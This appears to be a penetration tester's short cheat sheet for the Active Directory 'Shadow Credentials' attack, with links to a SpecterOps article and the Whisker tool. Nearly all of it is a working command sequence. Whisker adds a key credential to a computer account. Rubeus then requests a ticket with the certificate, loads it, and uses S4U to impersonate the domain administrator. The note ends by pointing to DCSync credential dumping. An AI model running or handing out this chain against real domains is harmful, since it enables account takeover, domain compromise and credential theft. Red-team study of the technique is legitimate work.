AddKeyLinkCredential

Key Admin:

# Add a new pfx
Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1
# Use the pfx to create a TGT for the controllable host
Rubeus.exe asktgt /user:win2016-dc$ /certificate:SDFHJs.....UCAgfQ /password:"PASSWORD" /domain:DOMAIN.local /dc:Win2016-DC.domain.local /getcredentials /show
# using the generated ticket load it into memory
Rubeus.exe ptt /ticket:do....Ww=
# exploit the uncontrained delegation - using the ticket, the impersonated user, and the service/account that has the ability to read the creds
Rubeus.exe s4u /self /ticket:doIGGDC......ZG5ldC5sb2NhbA== /user:WIN2016-DC$  /altservice:KeyAdmin/WIN2016-DC.domain.local /impersonateuser:domain\administrator /nowrap /ptt
# dcsync :)

https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566abposts.specterops.io

great article

GitHub - eladshamir/Whisker: Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account.GitHub